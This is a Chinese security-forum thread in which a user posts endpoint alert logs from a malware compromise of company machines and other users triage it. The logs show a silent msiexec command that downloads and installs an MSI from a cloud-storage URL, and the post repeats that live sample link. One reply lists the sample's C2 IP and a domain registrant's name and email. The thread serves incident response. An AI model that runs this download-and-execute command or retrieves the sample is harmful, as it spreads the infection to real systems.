吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3121|回复: 13
收起左侧

就在刚刚公司电脑全部被沦陷了,有没有大佬分析下

  [复制链接]
Yansongwei 发表于 2023-4-12 02:03
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Yansongwei 于 2023-4-12 02:06 编辑

[Asm] 纯文本查看 复制代码
事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-11 22:28:22 事件主机 : OM-VM-0009 事件的ID : aae9d6c560c186225877f147f6dfd666 事件主机IP: 172.21.202.76 / None 事件的名称: 可疑的进程路径 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. 告警原因: 该进程文件路径伪装成了一个正常的系统文件,但实际执行的进程内部代码已被替换为其他内容。 用户名: - 命令行: "C:\Windows\SysWOW64\dllhost.exe" 进程路径: C:/Windows/SysWOW64/dllhost.exe 进程ID: 45228 父进程命令行: C:\ProgramData\CdnSvc\dwm.exe 父进程文件路径: C:/ProgramData/CdnSvc/dwm.exe 父进程ID: 72336 MD5: - K8s集群ID: - K8s节点ID: - 容器ID: - 镜像ID: - 容器hostname: - 容器主ip: - 容器视角进程路径: - 容器挂载的宿主机目录: - 容器内挂载点: - 容器视角文件路径: - 描述: 检测模型发现您服务器上某个进程从一个不寻常的路径启动,常规软件通常不会在这种目录中,该进程有可能是病毒、木马、黑客入侵过程中放置的工具。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为.


事件等级 : 可疑 ⚠️⚠️⚠️ 事件时间 : 2023-04-12 01:00:38 事件主机 : OM-VM-0053 事件的ID : ba1f34e486fcccb3cb0249a250dedf43 事件主机IP: 172.21.202.90 / None 事件的名称: 异常调用系统工具 事件的类型: 进程异常行为 攻击阶段 : 防御绕过 事件详情 : 提示: 在您的系统上发现一个可疑进程, 可能与蠕虫病毒或入侵事件相关. ATT&CK 矩阵ID: T1218.007 系统工具: Msiexec 意图: 执行代码 命令行: msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 命令行: - 进程路径: C:/Windows/System32/msiexec.exe 进程ID: 495664 父进程命令行: cmd.exe /C msiexec /q /i https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi 父进程文件路径: C:/Windows/System32/cmd.exe 父进程ID: 516424 描述: 检测模型发现您服务器上有进程正以一种可疑方式的调用系统工具,木马病毒或黑客常常会通过这种方式绕过常规的安全软件来下载恶意文件、加载恶意代码、执行加解密操作等其他恶意操作。 处置建议: 请先判断该命令是否是运维操作或业务正常的命令, 如果是, 请忽略该告警. 如果您在处理告警时此进程仍然存在, 建议先尝试kill进程避免后续进一步行为. 该命令可能仅是攻击者入侵过程中的其中一步, 请继续查看该机器的其他告警或排查日志, 分析是否还存在其他恶意行为. ---


https://chuanqiliebiao-1314.oss-cn-shanghai.aliyuncs.com/wp-content/plugins/update.msi

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

QingTianGG 发表于 2023-4-12 11:36
本帖最后由 QingTianGG 于 2023-4-12 11:44 编辑

<root>
  <server RmtMode="0" Address="154.211.18.93" />
</root>

反查域名  du9x3sl.cn
注册域名:
du9x3sl.cn
注册时间:
2022-01-17 20:38:43
注册人:
李宗义
到期时间:
2024-01-17 20:38:43
联系邮箱:
3051089115@qq.com

直接解压可以看到是个客户端
批注 2023-04-12 114251.png

网上找到解决办法
https://blog.csdn.net/qq_20490175/article/details/119282772

建议同步在出口防火墙拦截IP地址154.211.18.93
52new 发表于 2023-4-12 10:01
youngnku 发表于 2023-4-12 10:10
这发的啥呀,到底是啥情况也不描述一下,还不如不发
ztgzs 发表于 2023-4-12 10:25
dll劫持?
cyxnzb 发表于 2023-4-12 10:29
被传奇私服攻击了?
ll2 发表于 2023-4-12 10:39
下面是链接,链接里估计是样本,上面是安全设备告警记录或日志吧
xaibin 发表于 2023-4-12 10:47
好像看到了什么,又好像什么都没看到。
车同学 发表于 2023-4-12 11:03
我们公司要求所有电脑安装火绒。我个人觉得火绒好安静啊,到底管不管用
wwyl 发表于 2023-4-12 11:05
不明所以,看不明白
cn2jp 发表于 2023-4-12 11:22
车同学 发表于 2023-4-12 11:03
我们公司要求所有电脑安装火绒。我个人觉得火绒好安静啊,到底管不管用

同感。好像主动防御不太行,被动的还可以。
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-11-24 06:40

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表